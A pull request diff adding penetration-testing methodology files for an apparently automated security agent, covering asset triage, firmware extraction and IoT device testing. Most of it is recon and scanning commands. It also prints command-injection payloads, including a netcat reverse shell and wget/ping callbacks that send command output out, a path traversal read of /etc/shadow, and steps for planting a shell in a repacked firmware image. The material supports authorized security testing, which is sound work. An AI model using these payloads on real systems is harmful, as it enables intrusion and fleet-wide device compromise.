### PR TITLE
feat(skills): hardware, physical & misc asset methodology skills

### DIFF
--- a/strix/skills/assets/other_asset.md
+++ b/strix/skills/assets/other_asset.md
@@ -1,0 +1,163 @@
+---
+name: other_asset
+description: Triage and assess an unclassified target identifier — fingerprint its real type, map the surface, then route to matching methodology
+---
+
+# Other Asset (Unclassified Identifier)
+
+An "Other Asset" is a bare identifier handed off without a declared type: a hostname, IP, URL, CIDR, an email/username, a package or container reference, a repo URL, a cloud ARN/resource ID, a file hash, a Bluetooth/MAC address, or an opaque string. The attacker's objective is identification first — convert the unknown identifier into a concrete asset class (web app, API, host/network, mobile app, source repo, cloud resource, container image, IoT/firmware), then map its real attack surface and route to the matching methodology instead of blindly throwing payloads at a string. Most early wins come from correct classification: the same `example.com` may resolve to a CDN edge, an S3 website, a Kubernetes ingress, or a legacy box — and each demands a different playbook.
+
+## Attack Surface
+
+What is exposed depends entirely on what the identifier *is*. The triage job is to enumerate which of these the string maps to:
+
+- **Network/host**: open TCP/UDP ports, exposed services (SSH, RDP, SMB, databases, admin panels), TLS endpoints, banners and versions.
+- **Web/API**: virtual hosts, paths, parameters, auth surface, JS bundles, OpenAPI/GraphQL/gRPC endpoints, headers, cookies.
+- **DNS/domain**: subdomains, MX/SPF/DKIM/DMARC, NS delegation, dangling CNAMEs (subdomain takeover), zone transfers.
+- **Source/supply-chain**: git repos, package names (pypi/npm/go), container images, IaC files, CI config — secrets, dependency confusion, typosquats.
+- **Cloud**: account IDs, ARNs, bucket names, resource IDs — public buckets, IAM exposure, metadata.
+- **Identity**: emails/usernames — breach exposure, OSINT, valid-account enumeration, auth surfaces.
+- **Binary/firmware/mobile**: APK/IPA, firmware blobs, hashes — embedded secrets, weak crypto, insecure components.
+
+## Recon & Enumeration
+
+**Step 0 — classify the identifier.** Decide its shape before touching the network.
+
+```bash
+ID="<the-identifier>"
+# IPv4/IPv6/CIDR?
+echo "$ID" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}(/[0-9]{1,2})?$' && echo "ip/cidr"
+echo "$ID" | grep -Eq ':' && echo "maybe ipv6/url-with-port"
+# URL/host?
+echo "$ID" | grep -Eq '^https?://' && echo "url"
+# email / username?
+echo "$ID" | grep -Eq '^[^@]+@[^@]+\.[^@]+$' && echo "email"
+# hashes (md5/sha1/sha256)
+echo "$ID" | grep -Eq '^[a-f0-9]{32}$'  && echo "md5"
+echo "$ID" | grep -Eq '^[a-f0-9]{64}$'  && echo "sha256"
+# cloud ARNs / resource refs
+echo "$ID" | grep -Eq '^arn:aws:' && echo "aws-arn"
+# package/container refs
+echo "$ID" | grep -Eq '^[a-z0-9._/-]+:[a-z0-9._-]+$' && echo "maybe-image-or-pkg"
+```
+
+**Host/IP/CIDR.**
+```bash
+naabu -host "$ID" -top-ports 1000 -rate 1000 -o naabu.txt          # fast port discovery
+nmap -sV -sC -Pn -p "$(paste -sd, naabu.txt | sed 's#.*:##')" "$ID" -oA nmap_$ID
+nmap -sU --top-ports 50 -Pn "$ID" -oN nmap_udp.txt                  # key UDP (dns,snmp,ntp,ike)
+```
+
+**DNS/domain.**
+```bash
+subfinder -d "$ID" -all -silent | tee subs.txt
+dnsx -l subs.txt -a -aaaa -cname -resp -silent -o dns.txt           # resolve + CNAMEs (takeover hints)
+dnsrecon -d "$ID" -t std,axfr                                       # zone transfer attempt + records
+```
+
+**Web/URL.**
+```bash
+httpx -l subs.txt -sc -title -tech-detect -server -ip -cdn -json -o httpx.json
+katana -list live_urls.txt -jc -kf all -d 3 -o crawl.txt            # crawl + JS endpoints
+ffuf -u "https://$ID/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -mc all -fc 404
+wafw00f "https://$ID"
+nuclei -l live_urls.txt -as -s critical,high -rl 50 -c 20 -timeout 10 -j -o nuclei.jsonl
+```
+
+**Source/supply-chain.**
+```bash
+trufflehog git https://github.com/<org>/<repo> --json > tru.json    # live-validated secrets
+gitleaks detect --source <repo_dir> -f json -r gitleaks.json
+semgrep --config auto <repo_dir>                                    # SAST when source is available
+trivy image <image:tag> --severity HIGH,CRITICAL                    # container/image CVEs + misconfig
+# SBOM / vuln map of binaries or images:
+# syft <image:tag> -o cyclonedx-json > sbom.json ; grype sbom:sbom.json
+```
+
+**Mobile/firmware (install on demand).**
+```bash
+apt-get install -y apktool binwalk                                  # if missing
+pip install frida-tools objection                                   # dynamic instrumentation
+# jadx/MobSF: github releases / docker run opensecurity/mobile-security-framework-mobsf
+jadx -d out_app app.apk ; apktool d app.apk -o app_decoded          # decompile/disassemble
+binwalk -Me firmware.bin                                            # carve firmware
+```
+
+**Cloud (install on demand).**
+```bash
+apt-get install -y awscli ; pip install scoutsuite prowler         # az/gcloud as needed
+aws s3 ls s3://<bucket> --no-sign-request                           # public bucket check
+prowler aws --severity critical high                                # if creds are in scope
+```
+
+**Identity.**
+```bash
+nuclei -u "https://$DOMAIN" -tags exposure,osint -silent
+# username/email validity via the app's own signup/login/reset oracles (manual httpx/ffuf)
+```
+
+## Methodology
+
+1. **Classify** the identifier (Step 0). If ambiguous, run cheap probes that disambiguate: `dnsx` (does it resolve?), `httpx` (does it serve HTTP?), `nmap -Pn -F` (is it a host?). The first answer decides the branch.
+2. **Resolve and expand.** Hostname → IPs and CNAMEs; IP → reverse DNS, ASN, neighbouring hosts; domain → subdomains; image/package → registry metadata and versions. Expand a single ID into the full set of related assets in scope.
+3. **Fingerprint** each resolved endpoint: services/versions (`nmap -sV`), web tech (`httpx -tech-detect`), TLS (cert SAN often reveals more hostnames), framework, cloud provider (`-cdn`).
+4. **Map the surface** for the now-known type: ports/services for hosts, routes/params/JS for web, repo files for source, registry layers for images.
+5. **Route to the matching methodology.** Hand the classified asset to the specialized playbook (web app, API, network/host, cloud, mobile, supply-chain). This skill's job ends at correct, well-scoped routing.
+6. **Run baseline checks** for the class with bounded tools (nuclei `-as`, trivy, semgrep, trufflehog) before deep manual work.
+7. **Triage findings** by confirmable impact; chase the highest-value confirmed lead first.
+
+## Key Weaknesses / Techniques
+
+- **Misclassification waste** — treating a CDN edge IP as an origin, or a wildcard DNS as live hosts. Verify liveness with `httpx -sc` and confirm the server actually owns the response (no `cdn:true`, plausible `Server`/cert).
+- **Subdomain takeover** — a resolved CNAME points to a deprovisioned third-party (S3/GitHub Pages/Heroku/Azure). Confirm:
+  ```bash
+  dig +short sub.target.tld CNAME
+  curl -sI https://sub.target.tld    # look for "NoSuchBucket", "There isn't a GitHub Pages site here"
+  nuclei -u https://sub.target.tld -tags takeover -silent
+  ```
+- **Exposed services on hosts** — unauthenticated DBs/admin/management ports surfaced by `naabu`/`nmap`: Redis (6379), Mongo (27017), Elastic (9200), Docker (2375), RDP (3389), SMB (445). Validate with a read-only probe (`redis-cli -h host ping`, `curl host:9200/_cat/indices`).
+- **Secrets in source/images** — keys committed to git or baked into image layers. `trufflehog` only reports *verified* secrets (`"Verified":true`); prefer those.
+- **Dependency confusion / typosquatting** — an internal package name resolvable on a public registry, or a near-miss of a popular one. Check public registry for the exact internal name.
+- **Public cloud storage** — bucket names guessed from the org/domain; list and read with `--no-sign-request`.
+- **Account/credential exposure** — for email/username IDs, valid-account enumeration via differential responses on login/reset/signup, plus checking the auth surface those identities unlock.
+
+## Validation
+
+Confirm a real finding with a minimal, reproducible PoC scoped to authorized testing:
+
+- **Open service**: a single benign command returning real data, e.g. `redis-cli -h <host> info server`, `curl -s <host>:9200/_cat/indices`, or an `nmap -sV` banner with version. Capture exact host:port and output.
+- **Subdomain takeover**: show the dangling CNAME *and* the third-party's "not claimed" error; do not actually claim the resource — document that it is claimable.
+- **Secret**: show `trufflehog` `Verified:true` or perform one least-privilege, read-only API call proving the credential is live (e.g. `aws sts get-caller-identity`), then stop.
+- **Public bucket**: list one prefix and read one non-sensitive object key to prove access; record the bucket and command.
+- **Web vuln**: reproduce the nuclei/manual finding with a clean curl request and the response delta that proves it.
+
+Always record the identifier, the resolved asset, the exact command, and the observed evidence.
+
+## False Positives
+
+- **Wildcard DNS / catch-all hosts** — every subdomain "resolves." Confirm with a random label: `dnsx -d nonexistent-$RANDOM.target.tld`; if it resolves identically, the data is noise.
+- **CDN/WAF-fronted IPs** — ports and banners belong to the edge, not the target. Cross-check `httpx -cdn` and cert ownership before reporting host-level issues.
+- **Unverified secrets** — high-entropy strings that are placeholders, example keys, or already-rotated. Trust only validated hits.
+- **CVE matched by version banner only** — nuclei/trivy version matches without confirming the vulnerable code path is reachable. Validate before claiming.
+- **OSINT breach hits not tied to the live system** — an email in an old breach is not access to *this* asset.
+- **Honeypots/decoys** — improbably wide-open hosts with inconsistent banners; corroborate before chasing.
+
+## Chaining & Impact
+
+- **ID → DNS expansion → subdomain takeover → phishing/cookie theft** on the parent domain's trusted origin.
+- **Repo URL → verified secret → cloud creds → metadata/role assumption → data store access** (classic supply-chain to cloud pivot).
+- **Host scan → exposed Redis/Docker/Jenkins → RCE → internal foothold → lateral movement** across the discovered CIDR.
+- **Image ref → leaked credentials in a layer → registry/CI access → poisoned build pipeline.**
+- **Username/email → valid-account enumeration → credential stuffing / password reset abuse → account takeover.**
+- A correctly classified low-value-looking ID often expands into the full in-scope estate; the chain usually starts with one accurate fingerprint.
+
+## Pro Tips
+
+1. Spend the first five minutes only on classification — the wrong playbook on the right target wastes the most time.
+2. Always expand one identifier into its related set: certs (SAN), reverse DNS, ASN neighbours, and CNAME targets routinely reveal more in-scope assets than the original ID.
+3. TLS certificates are a free recon goldmine — `echo | openssl s_client -connect host:443 2>/dev/null | openssl x509 -noout -text` for extra hostnames and internal CN hints.
+4. Distinguish edge from origin early; an IP behind a CDN gives misleading scan data and burns budget.
+5. For opaque strings, search the org's own JS bundles and `katana` output — identifiers often reappear next to context that reveals their type.
+6. Prefer tools that *validate* (trufflehog verified, grype against a real SBOM, nuclei `-as`) over signature-only matchers to cut false positives before manual work.
+7. Re-run liveness (`httpx -sc`) before deep testing; scope contents drift and dead hosts waste effort.
+8. When the type stays ambiguous after probes, document it as "unresolved identifier" with what was ruled out — a clean negative is a valid result.

--- a/strix/skills/hardware/firmware.md
+++ b/strix/skills/hardware/firmware.md
@@ -1,0 +1,143 @@
+---
+name: firmware
+description: Firmware image analysis — extract the filesystem, hunt secrets, services, and backdoors, then emulate to validate exploitable findings.
+---
+
+# Firmware
+
+A firmware image is the packed software stack of an embedded device (router, IoT, camera, ICS controller, BMC). The asset is usually a single binary blob — a vendor `.bin`/`.img`/`.fwu`/`.hdr` update file or a flash dump. The objective is to unpack it down to a root filesystem, recover hardcoded secrets and crypto material, enumerate every service and start-up script that runs on boot, and identify undocumented access (backdoor accounts, debug shells, magic packets) and vulnerable native binaries. Findings here translate directly into device compromise, fleet-wide credential reuse, and supply-chain risk.
+
+## Attack Surface
+
+- **The image itself**: header/magic, compression (gzip/lzma/xz/squashfs/cramfs/jffs2/ubifs), partition layout, padding, appended signatures.
+- **Root filesystem**: `/etc` configs, `/etc/passwd` + `/etc/shadow`, init scripts (`/etc/init.d`, `/etc/rc.local`, `S*` scripts), `/etc/inittab`, busybox applet set.
+- **Network services**: web UI (lighttpd/uhttpd/boa/goahead/mini_httpd + CGI), telnetd/dropbear/ssh, UPnP/miniupnpd, SNMP, TR-069/CWMP client, DNS/dnsmasq, custom daemons listening on TCP/UDP.
+- **Secrets at rest**: TLS private keys, SSH host keys, API tokens, cloud (AWS/Azure) creds, WPA PSKs, default admin passwords, signing/update keys, hardcoded crypto keys/IVs.
+- **Update mechanism**: signature verification (or lack thereof), update URL, encryption key embedded in the binary.
+- **Native binaries**: CGI handlers, daemons, SUID files — memory-corruption and command-injection sinks.
+- **Bootloader/U-Boot env**, NVRAM defaults, and any second-stage payloads or appended encrypted blobs.
+
+## Recon & Enumeration
+
+Install the embedded-analysis toolchain (Kali):
+```
+apt-get install -y binwalk firmware-mod-kit squashfs-tools cramfsswap mtd-utils \
+    sasquatch jefferson ubi_reader fakeroot qemu-user-static u-boot-tools \
+    pipx && pipx install uefi_firmware && pip3 install firmware-analysis-toolkit
+```
+`binwalk` is the workhorse; pull EMBA/FACT or `firmwalker` for higher-level passes when scope allows.
+
+```
+# 1. Identify the container before trusting any extension
+file fw.bin; binwalk fw.bin                # signature/entropy map of embedded files
+binwalk -E fw.bin                          # entropy graph: flat ~8.0 == encrypted/compressed
+hexdump -C fw.bin | head                   # inspect header/magic manually
+
+# 2. Recursively carve and extract the filesystem
+binwalk -eM fw.bin                         # recursive extract -> _fw.bin.extracted/
+                                           # use sasquatch fallback for vendor-mangled squashfs
+unsquashfs -d rootfs <offset>.squashfs     # manual squashfs unpack
+jefferson jffs2.img -d jffs2_out           # JFFS2; ubireader_extract_files for UBIFS
+
+# 3. Map the unpacked tree
+ROOT=$(find _fw.bin.extracted -name 'bin' -type d | head -1 | xargs dirname)
+ls -la "$ROOT"; cat "$ROOT/etc/os-release" "$ROOT/etc/openwrt_release" 2>/dev/null
+
+# 4. Hunt secrets across the whole tree
+trufflehog filesystem "$ROOT" --json --no-update > secrets.json
+gitleaks detect --no-git --source "$ROOT" -f json -r gitleaks.json
+grep -rInE 'password|passwd|secret|api[_-]?key|token|BEGIN (RSA|EC|OPENSSH|PRIVATE)' "$ROOT"
+find "$ROOT" -name '*.pem' -o -name '*.key' -o -name 'shadow' -o -name '*.p12'
+
+# 5. SBOM / known-CVE component inventory
+syft dir:"$ROOT" -o cyclonedx-json=sbom.json   # or: trivy rootfs "$ROOT"
+grype sbom:sbom.json                            # CVEs for busybox/openssl/dropbear/dnsmasq versions
+trivy rootfs --scanners vuln,secret "$ROOT"
+
+# 6. Static analysis of scripts and native binaries
+semgrep --config p/bash --config p/c "$ROOT" --json -o semgrep.json
+for b in $(find "$ROOT" -type f -exec file {} + | grep -i 'ELF' | cut -d: -f1); do
+  echo "== $b"; file "$b"; strings -n8 "$b" | grep -iE 'system\(|popen|/bin/sh|GET /|secret'
+done
+
+# 7. Once emulated and a service is live, treat it like any web/network target
+nmap -sV -p- 127.0.0.1; httpx -u http://127.0.0.1:80 -title -tech-detect
+nuclei -u http://127.0.0.1:80 -as -s critical,high -silent -j -o nuclei.jsonl
+ffuf -w /usr/share/wordlists/dirb/common.txt -u http://127.0.0.1/FUZZ
+```
+
+## Methodology
+
+1. **Fingerprint the blob.** `file`, `binwalk`, and an entropy scan. Flat ~8.0 entropy = encrypted or already-compressed; carving will fail. Note vendor magic, header strings, and version markers.
+2. **Defeat packaging.** If encrypted, find the decryptor: search prior plaintext firmware versions, the bootloader, or the update binary for the AES key/IV (`strings`, `binwalk -y aes`). Many vendors ship one unencrypted early release — diff it.
+3. **Carve and mount.** Recursively extract; use `sasquatch`/`jefferson`/`ubi_reader` when stock tools choke on patched filesystems. Confirm you reached a real root (`/bin`, `/etc`, `/sbin` present).
+4. **Inventory the OS.** Identify base (OpenWrt/Buildroot/vendor SDK), kernel version, libc, busybox version and applet list. Build an SBOM for CVE mapping.
+5. **Crack credentials.** Pull `/etc/passwd` + `/etc/shadow`; `unshadow` then `john`/`hashcat`. Find plaintext defaults in web configs and NVRAM defaults.
+6. **Harvest secrets.** TruffleHog + gitleaks + targeted grep for keys, tokens, cloud creds, TLS/SSH private keys, signing keys, hardcoded crypto.
+7. **Map boot and services.** Read `inittab`, `rc*`, `init.d`, and any `/etc/config`; list every daemon that auto-starts and the ports/sockets it binds.
+8. **Audit native code.** Disassemble CGIs and daemons (Ghidra/`r2`/`objdump`) for command-injection (`system`/`popen` on tainted input), unauthenticated handlers, and memory-corruption sinks.
+9. **Emulate.** `firmadyne`/FAT (`fat.py`) or per-binary `qemu-<arch>-static` chroot. Bring the web stack up locally and exercise it.
+10. **Validate** each candidate against the running service with a concrete PoC; record exact request/payload and observed effect.
+
+## Key Weaknesses / Techniques
+
+- **Backdoor / static accounts.** Non-disabled root in `/etc/passwd`, identical `$1$`/`$6$` hash across the fleet, or undocumented users.
+  ```
+  unshadow "$ROOT/etc/passwd" "$ROOT/etc/shadow" > unshadow.txt
+  john --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt; john --show unshadow.txt
+  hashcat -m 1800 hashes.txt rockyou.txt   # sha512crypt
+  ```
+- **Hardcoded crypto / shared TLS keys.** A private key in firmware means every device shares it — passive decryption and impersonation. Confirm reuse by fingerprinting the public half.
+  ```
+  find "$ROOT" -name '*.key' -o -name '*.pem' | while read k; do openssl rsa -in "$k" -noout -modulus 2>/dev/null | md5sum; done
+  ```
+- **Command injection in CGI/daemons.** Web params reaching `system()`/`popen()`/backticks. Grep the binary, then confirm on the emulated service.
+  ```
+  curl 'http://127.0.0.1/cgi-bin/ping.cgi' --data 'host=127.0.0.1;id'   # observe id output
+  curl 'http://127.0.0.1/api/diag' --data 'addr=$(busybox nc 10.0.0.1 4444 -e /bin/sh)'
+  ```
+- **Unauthenticated / magic-packet access.** Hidden endpoints, debug query params (`?debug=1`), or a UDP/TCP listener that drops a root shell on a trigger string (search daemons for raw socket reads compared against constants).
+- **Insecure update channel.** No signature verification or signature checked client-side only — craft a malicious image accepted by the device. Look for the verify routine; absence of `RSA_verify`/`ED25519`/cert pinning is the tell.
+- **Known-CVE components.** Old dropbear/openssl/dnsmasq/busybox/zlib. Map exact versions from the SBOM to `grype`/`searchsploit`.
+- **World-writable / SUID surfaces.** `find "$ROOT" -perm -4000 -o -perm -0002 -type f` — SUID busybox or writable scripts in the boot path are privesc.
+- **Debug interfaces left enabled.** `telnetd`/`utelnetd` started in init, dropbear with default keys, serial getty on UART.
+
+## Validation
+
+1. Reproduce in emulation, not just statically — `fat.py fw.bin` or chroot QEMU, then hit the live service so a PoC is observable (`nmap -sV 127.0.0.1` shows the bound port, `curl` returns injected output).
+2. For credentials: actually crack the hash and log in (`ssh`/web auth) or show the plaintext default authenticates against the running service.
+3. For shared keys: prove the key matches a deployed device's served certificate (modulus/SPKI fingerprint match), not just that a key file exists.
+4. For command injection: capture command output in the response (`id`, `uname -a`) or a callback — `interactsh-client -v`, then payload `;wget http://<oast-domain>/$(id|tr ' ' _)` and confirm the inbound hit.
+5. For update bypass: build a modified image, repack with the original packer, and show the device/loader accepts it.
+6. Save the exact offset, file path, binary, and request that triggers the issue so it is independently reproducible.
+
+## False Positives
+
+- Strings that look like keys but are test fixtures, public certs, CA bundles (`/etc/ssl/certs`), or example configs never loaded at runtime.
+- Disabled accounts: shadow entry is `*`/`!`/`!!` or login shell is `/bin/false`/`/sbin/nologin` — no actual access.
+- "Secrets" that are unique per-device, generated at first boot by an init script (grep the scripts for the writer) rather than baked in.
+- A service binary present but never started — confirm it appears in `inittab`/`rc`/`init.d` before reporting it as live.
+- CVEs against a component the device backported a fix for, or against a code path not compiled in (check `strings`/build flags).
+- Command-injection sinks fed only by trusted/internal values, not attacker-reachable input — trace the data flow to a network parameter.
+- Decompression "files" that are binwalk false carves (zero-length, garbage). Re-extract and verify the filesystem mounts.
+
+## Chaining & Impact
+
+- Hardcoded admin/default cred → web UI auth → CGI command injection → root shell on every unit in the field.
+- TLS/SSH private key in firmware → passive traffic decryption + device impersonation → MITM of the management plane across the fleet.
+- Update-signature bypass → push a malicious image → persistent, undetectable implant and supply-chain compromise.
+- Cloud/API token in the image → pivot to the vendor backend or device-management cloud → fleet-wide control.
+- Recovered VPN/WPA/PPPoE secrets → access the operator network behind the device.
+- Memory-corruption in an unauthenticated daemon → pre-auth RCE → worming across reachable devices.
+
+## Pro Tips
+
+1. Run `binwalk -E` first. If entropy is flat-high the image is encrypted — stop carving and go find the key (prior firmware version, bootloader, or update tool almost always leaks it).
+2. Diff firmware versions. Two releases reveal the encryption key, what was patched, and where backdoors were added or removed (`diffoscope`, or extract both and `diff -r`).
+3. When stock `binwalk`/`unsquashfs` fail, vendors used a patched squashfs — switch to `sasquatch`; for NAND dumps strip OOB/ECC before extracting.
+4. Always check NVRAM defaults and `default.cfg`/`reset.cfg`, not just `/etc` — factory creds and hidden flags live there.
+5. Emulation is worth the effort: many command-injection and auth-bypass bugs are only confirmable against the running CGI stack (`fat.py` / firmadyne handles networking and nvram shims).
+6. Grep daemons for raw `recvfrom`/`read` compared against string constants — that pattern is a classic magic-packet backdoor.
+7. Map exact library versions to CVEs via SBOM before manual reversing; busybox/dropbear/openssl versions alone often yield critical known bugs.
+8. Check the update verify path explicitly — "signed firmware" is often verified only in the app/cloud, not on-device, leaving the loader fully bypassable.
+9. Keep extraction outputs and offsets; embedded analysis is iterative and you will re-carve as you learn the layout.

--- a/strix/skills/hardware/hardware_iot.md
+++ b/strix/skills/hardware/hardware_iot.md
@@ -1,0 +1,156 @@
+---
+name: hardware_iot
+description: Hardware/IoT testing - firmware extraction, exposed services, debug interfaces, update flows, and cloud/companion-app chains
+---
+
+# Hardware / IoT Testing
+
+A Hardware/IoT asset is an embedded device (router, camera, NVR, gateway, smart-home hub, industrial sensor, medical/automotive ECU) plus the firmware it runs and the back-end/companion app it talks to. The attacker's objective is to extract and analyze firmware, reach network and debug services the vendor assumed were private, abuse the update mechanism, recover embedded secrets, and chain a single device foothold into account takeover, the vendor cloud, or every other device on the same product line. Most authorized engagements start from a firmware image or an IP on the LAN; this skill covers both the file-on-disk and the live-on-network paths. For the cloud back end see the cloud skills; for the companion mobile app see the mobile skill; for SSRF from the device's own fetchers see the ssrf skill.
+
+## Attack Surface
+
+**Network-exposed services**
+- HTTP/HTTPS admin UI and REST/JSON-RPC APIs (80/443/8080/8443, often with weak/default creds)
+- Telnet/SSH/Dropbear (23/22/2222), frequently with hardcoded or vendor-recovery accounts
+- UPnP/SSDP (1900/udp), SOAP control endpoints, WS-Discovery for cameras (3702/udp)
+- RTSP/ONVIF (554, 8000), MQTT (1883/8883), CoAP (5683/udp), Modbus (502), DNP3, BACnet
+- mDNS/DNS-SD (5353/udp), proprietary discovery/provisioning ports, TR-069/CWMP (7547)
+- "Debug" or "diag" web pages, cgi-bin handlers, and undocumented backdoor ports
+
+**Physical / local debug interfaces**
+- UART serial console (3.3V TX/RX/GND header) - root shell or U-Boot prompt
+- JTAG/SWD for halt/dump/flash, SPI/NAND flash chips read with a clip + flashrom
+- USB recovery/DFU modes, SD-card update images, exposed eMMC test pads
+
+**Firmware and update flow**
+- OTA/update servers (often plain HTTP, no signature, predictable URLs)
+- Update file formats (.bin/.img/.dav/.pkg/.swu/.cramfs/UBI/squashfs/CPIO)
+- Bootloader (U-Boot/UEFI) env, secure-boot chain, A/B partitions, rollback policy
+
+**Cloud / companion chain**
+- Device-to-cloud auth (per-device certs, shared API keys, MQTT topics)
+- Companion mobile/desktop app and the API both it and the device share
+- Pairing/provisioning flows (BLE, SoftAP, QR onboarding)
+
+## Recon & Enumeration
+
+Install the embedded-specific tooling (most are not in the base Kali image):
+
+```bash
+# firmware unpacking + analysis
+pipx install binwalk            # or: apt-get install -y binwalk
+git clone https://github.com/onekey-sec/unblob && pipx install unblob
+apt-get install -y squashfs-tools sleuthkit u-boot-tools cpio device-tree-compiler
+pip install firmware-mod-kit ubi_reader 2>/dev/null; apt-get install -y mtd-utils
+git clone https://github.com/scriptingxss/EMBA   # full pipeline; or use FACT
+# binary / RE
+apt-get install -y radare2 gdb-multiarch qemu-user-static qemu-system; pip install ROPgadget
+# hardware bench (when physical access is in scope)
+apt-get install -y flashrom minicom picocom screen openocd
+pip install esptool
+```
+
+Live network device:
+```bash
+# fast port sweep, then deep service/version fingerprint
+naabu -host 10.0.0.5 -p - -rate 2000 -o ports.txt
+nmap -sSU -sV -O -p $(paste -sd, ports.txt) --version-all -sC -oA iot_scan 10.0.0.5
+nmap -sU -p 1900,5353,5683,3702,502 --script=upnp-info,broadcast-dns-service-discovery 10.0.0.5
+# web surfaces
+httpx -l ips.txt -p 80,443,8080,8443,8000,8888,7547 -title -tech-detect -status-code -o web.txt
+nuclei -l web.txt -tags iot,router,camera,default-login,exposure,cve -s critical,high -rl 50 -j -o nuclei.jsonl
+ffuf -u http://10.0.0.5/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e .cgi,.bin,.cfg -mc 200,401,403
+katana -u http://10.0.0.5 -jc -d 3 -o endpoints.txt
+wafw00f http://10.0.0.5     # rarely a WAF, but confirms reverse proxy / firmware web stack
+```
+
+Firmware on disk:
+```bash
+binwalk -Me firmware.bin                 # signature scan + recursive extract
+unblob -e extracted/ firmware.bin        # more reliable on UBI/odd containers
+binwalk -E firmware.bin                  # entropy graph -> flat high entropy = encrypted/compressed
+file extracted/*; fdisk -l firmware.bin  # identify partition layout
+dtc -I dtb -O dts extracted/*.dtb        # device-tree -> SoC, peripherals, memory map
+mount -o loop,ro rootfs.squashfs /mnt    # or: unsquashfs rootfs.squashfs
+strings -n 8 firmware.bin | grep -Ei 'http|password|key|secret|admin|token|ftp://'
+```
+
+Secret + dependency scanning over the extracted rootfs:
+```bash
+trufflehog filesystem extracted/ --only-verified --json > secrets.json
+gitleaks detect --no-git -s extracted/ -r gitleaks.json
+syft dir:extracted/ -o table; grype dir:extracted/   # SBOM + known-vuln components (busybox, openssl, dropbear, zlib)
+trivy rootfs extracted/                                # OS-package CVEs in the squashfs
+semgrep --config auto extracted/usr/  extracted/www/  # cgi scripts, lua, php in the web root
+```
+
+## Methodology
+
+1. **Acquire firmware.** Pull from vendor download portal, intercept the OTA URL (often plain HTTP in `httpx`/proxy logs), dump over UART/`flashrom`/`esptool read_flash`, or extract from the companion app's bundled update. Hash and version-pin every image you analyze.
+2. **Unpack and map.** `binwalk -Me` then `unblob` as fallback; identify bootloader, kernel, rootfs (squashfs/UBIFS/jffs2), and any encrypted blobs (flat entropy near 1.0). Recover the device-tree and `/etc` to learn the SoC, init system, and enabled services.
+3. **Harvest the rootfs.** Enumerate `/etc/passwd` + `/etc/shadow` (crack with `john`/`hashcat`), startup scripts (`/etc/init.d`, `/etc/rc.d`), `inittab` (console = root spawns), web root (`/www`, `/usr/share/www`, cgi-bin), config defaults, TLS keys/certs, and `authorized_keys`. Run trufflehog/gitleaks/syft/grype/trivy here.
+4. **Statically audit binaries.** Triage cgi/httpd/proprietary daemons in radare2; grep for `system(`, `popen(`, `exec`, `strcpy`, `sprintf`, format strings; find auth checks and "magic" backdoor parameters. Map every user-reachable input to a sink.
+5. **Emulate.** Run target binaries under `qemu-<arch>-static` (chroot the extracted rootfs), or full-system emulate with EMBA/FirmAE to bring up the web UI without hardware. This lets you fuzz and exploit safely and reproducibly.
+6. **Exercise the live device.** Confirm default creds, hit the API/cgi endpoints, test auth bypass, command injection, path traversal, and SSRF against findings from static analysis.
+7. **Attack the update flow.** Determine whether updates are signed and version-checked; attempt downgrade and a malicious-image install (see below).
+8. **Follow the cloud/companion chain.** Extract device->cloud credentials, replay them, test multi-tenant isolation, and pivot to the vendor API.
+9. **Report per device class** - one firmware bug usually affects an entire SKU/fleet; state the blast radius.
+
+## Key Weaknesses / Techniques
+
+- **Default / hardcoded credentials.** Crack `/etc/shadow`, grep configs and binaries for embedded passwords/keys, then validate on the live service.
+  `john --format=crypt shadow --wordlist=/usr/share/wordlists/rockyou.txt`; hardcoded telnet often: `telnet 10.0.0.5` then vendor recovery user.
+- **Command injection in cgi/API.** Web handlers shell out to `system()` with user input (ping/traceroute/diag/filename params).
+  `curl 'http://10.0.0.5/cgi-bin/diag.cgi?host=127.0.0.1;id'` ; blind: `;ping -c1 $(hostname).<id>.oast.fun` and watch `interactsh-client`.
+- **Authentication bypass.** Static-side cookie/`__SID`-only checks, `?auth=1` flags, referer-based gating, or unauthenticated info-leak cgi that returns admin creds. Compare an authed vs unauthed request to the same endpoint.
+- **Path traversal / arbitrary file read.** `curl --path-as-is 'http://10.0.0.5/../../../../etc/shadow'` or a `file=` param; reads config/keys -> escalates to full auth bypass.
+- **Unsigned / downgradeable firmware update.** If the image has no signature (no PKCS#7/RSA blob, install accepts a modified `.bin`), inject a startup line or `authorized_keys`, repack, and flash:
+  ```bash
+  # add a root dropbear key / reverse shell into init, then repack squashfs
+  mksquashfs newroot rootfs.squashfs -comp xz -b 131072
+  binwalk -B firmware.bin   # confirm header/checksum format, then fix the CRC the loader checks
+  ```
+  Even if signed, test **downgrade** to a known-vulnerable signed version and weak/missing anti-rollback.
+- **Memory-corruption in network daemons.** Stack overflows in custom httpd/UPnP/SOAP parsers (no ASLR/PIE, often no NX). Confirm crash under qemu/gdb-multiarch, build ROP with ROPgadget.
+- **Insecure transport / weak crypto.** Plaintext HTTP/MQTT/Telnet, hardcoded TLS private keys reused fleet-wide (extract from rootfs, MITM all devices), weak cipher, no cert validation in device->cloud.
+- **Exposed debug interfaces.** UART giving an unauthenticated root shell or interruptible U-Boot (`setenv bootargs ... init=/bin/sh`); JTAG halt/dump. Document as physical-access findings.
+- **Vulnerable third-party components.** Ancient BusyBox/Dropbear/OpenSSL/libupnp surfaced by `grype`/`trivy`; map each CVE to a reachable service before claiming exploitability.
+
+## Validation
+
+1. **File-read / injection:** show the actual stolen content (`/etc/shadow`, a config secret) or a deterministic OAST callback from the device's source IP, plus the exact request that triggered it.
+2. **Auth bypass:** demonstrate a privileged action (read fleet config, change admin password, view RTSP stream) without valid credentials, and show the same request failing the intended auth path.
+3. **Malicious update:** install a benign marker payload (file write, distinctive banner, or a callback on boot) via the update channel and prove it survives reboot - never brick the device; keep a known-good image to restore.
+4. **Memory bug:** reproduce the crash deterministically under qemu/gdb with the offending input, then show controlled PC/register state (no need to weaponize beyond control-of-flow on an authorized device).
+5. **Credential reuse / cloud pivot:** authenticate to the vendor API with device-extracted creds and read only your own (or test-account) data to prove the access path.
+Always record device model, firmware version + hash, and exact reproduction steps - findings are SKU-wide.
+
+## False Positives
+
+- High entropy alone is not "encryption" - LZMA/gzip/xz payloads also read ~0.99; confirm with `binwalk -Me`/`unblob` before claiming an encrypted blob.
